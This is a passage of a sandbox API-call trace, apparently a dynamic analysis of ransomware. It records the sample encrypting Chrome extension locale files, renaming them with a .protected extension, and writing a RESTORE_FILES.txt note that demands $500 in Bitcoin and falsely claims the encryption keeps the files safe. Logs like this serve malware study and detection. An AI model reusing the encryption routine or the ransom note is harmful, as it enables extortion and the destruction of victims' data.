lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.897] CloseHandle (hObject=0x168) returned 1 [0083.897] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.protected") returned 174 [0083.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.protected")) returned 1 [0083.898] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.898] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.898] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\RESTORE_FILES.txt") returned 168 [0083.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.899] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.899] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, 
nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.899] lstrlenA (lpString="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") returned 684 [0083.899] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.900] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.900] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.900] CloseHandle (hObject=0x164) returned 1 [0083.900] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0083.900] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl") returned 150 [0083.900] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0083.900] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0083.900] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\*") returned 152 [0083.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.900] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.900] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.900] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.900] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.900] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.900] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\.") returned 152 [0083.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.901] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.901] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.901] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.901] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.901] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.901] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.901] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\..") returned 153 [0083.901] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.901] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.901] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.901] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json") returned 164 [0083.901] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.901] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.901] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.901] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json") returned 164 [0083.902] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json") returned 164 [0083.902] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json") returned 164 [0083.902] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.902] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.903] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.903] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.904] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.904] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.904] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.904] CloseHandle (hObject=0x168) returned 1 [0083.904] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.protected") returned 174 [0083.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.protected")) returned 1 [0083.905] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.905] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.905] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\RESTORE_FILES.txt") returned 
168 [0083.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.905] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.905] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.906] lstrlenA (lpString="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") returned 684 [0083.906] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.906] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.906] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.906] CloseHandle (hObject=0x164) returned 1 [0083.906] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="Windows") returned -1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="Program Files") returned 1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="Program Files (x86)") returned 1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="$Recycle.bin") returned 1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="System Volume Information") returned -1 [0083.906] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt") returned 150 [0083.906] lstrcmpW (lpString1="pt", lpString2=".") returned 1 [0083.906] lstrcmpW (lpString1="pt", lpString2="..") returned 1 [0083.906] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\*") returned 152 [0083.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.906] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.906] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.906] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.906] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.906] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.907] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\.") returned 152 [0083.907] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.907] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.907] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.907] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.907] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.907] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.907] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.907] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\..") returned 153 [0083.907] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.907] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.907] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.907] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json") returned 164 [0083.907] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.907] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.907] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.907] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json") returned 164 [0083.908] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json") returned 164 [0083.908] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json") 
returned 164 [0083.908] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.908] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.909] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.909] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.910] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.910] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.910] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.910] CloseHandle (hObject=0x168) returned 1 [0083.910] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.protected") returned 174 [0083.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.protected")) returned 1 [0083.910] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.911] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\RESTORE_FILES.txt") returned 168 [0083.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 